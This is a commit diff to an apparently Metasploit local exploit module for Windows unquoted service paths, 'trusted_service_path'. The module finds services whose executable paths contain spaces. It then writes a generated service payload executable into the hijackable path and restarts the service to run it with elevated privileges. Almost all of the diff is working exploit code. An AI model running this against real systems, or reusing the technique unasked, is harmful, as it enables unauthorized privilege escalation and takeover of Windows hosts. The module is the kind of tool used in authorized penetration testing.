Tidyup trusted_service_path
Use filedropper, use service exe, dont migratebug/bundler_fix
Meatballs
parent
484bf2f8fc
commit
101e5a8ccf
|
|
@ -9,6 +9,7 @@ require 'msf/core/exploit/exe'
|
|||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Services
|
||||
|
|
@ -44,10 +45,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
],
|
||||
'Platform' => [ 'win'],
|
||||
'Targets' => [ ['Windows', {}] ],
|
||||
'SessionTypes' => [ "shell", "meterpreter" ],
|
||||
'SessionTypes' => [ "meterpreter" ],
|
||||
'DefaultTarget' => 0,
|
||||
# Migrate away, in case the service dies (can kill access)
|
||||
'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }
|
||||
))
|
||||
end
|
||||
|
||||
|
|
@ -77,8 +76,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
next if cmd !~ /^[a-z]\:.+\.exe$/i
|
||||
next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
|
||||
|
||||
vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})")
|
||||
vuln_services << [name, cmd]
|
||||
vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
|
||||
vuln_services << [service[:name], cmd]
|
||||
|
||||
# This process can be pretty damn slow.
|
||||
# Allow the user to just find one, and get the hell out.
|
||||
|
|
@ -95,63 +94,32 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
#
|
||||
print_status("Finding a vulnerable service...")
|
||||
svrs = enum_vuln_services(true)
|
||||
if svrs.empty?
|
||||
print_error("No service found with trusted path issues")
|
||||
return
|
||||
end
|
||||
|
||||
fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
|
||||
|
||||
svr_name = svrs.first[0]
|
||||
fpath = svrs.first[1]
|
||||
exe_path = "#{fpath.split(' ')[0]}.exe"
|
||||
print_status("Placing #{exe_path} as #{svr_name}")
|
||||
|
||||
print_status("Placing #{exe_path} for #{svr_name}")
|
||||
|
||||
#
|
||||
# Drop the malicious executable into the path
|
||||
#
|
||||
exe = generate_payload_exe
|
||||
exe = generate_payload_exe_service({:servicename=>svr_name})
|
||||
print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
|
||||
begin
|
||||
write_file(exe_path, exe)
|
||||
register_files_for_cleanup(exe_path)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
# Can't write the file, can't go on
|
||||
print_error(e.message)
|
||||
return
|
||||
fail_with(Failure::Unknown, e.message)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Run the service, let the Windows API do the rest
|
||||
#
|
||||
print_status("Launching service #{svr_name}...")
|
||||
tried = false
|
||||
begin
|
||||
status = service_start(svr_name)
|
||||
raise RuntimeError, status if status != Error::SUCCESS
|
||||
rescue RuntimeError => s
|
||||
if tried
|
||||
print_error("Unable to start #{svr_name}")
|
||||
return
|
||||
else
|
||||
tried = true
|
||||
end
|
||||
|
||||
case s.message.to_i
|
||||
when Error::SERVICE_ALREADY_RUNNING
|
||||
service_stop(svr_name)
|
||||
retry
|
||||
when Error::SERVICE_DISABLED
|
||||
service_change_startup(svr_name, 'manual')
|
||||
retry
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# "Nothing ever happened, we swears it on the Precious!"
|
||||
#
|
||||
print_status("Deleting #{exe_path}")
|
||||
file_rm(exe_path)
|
||||
service_restart(svr_name)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue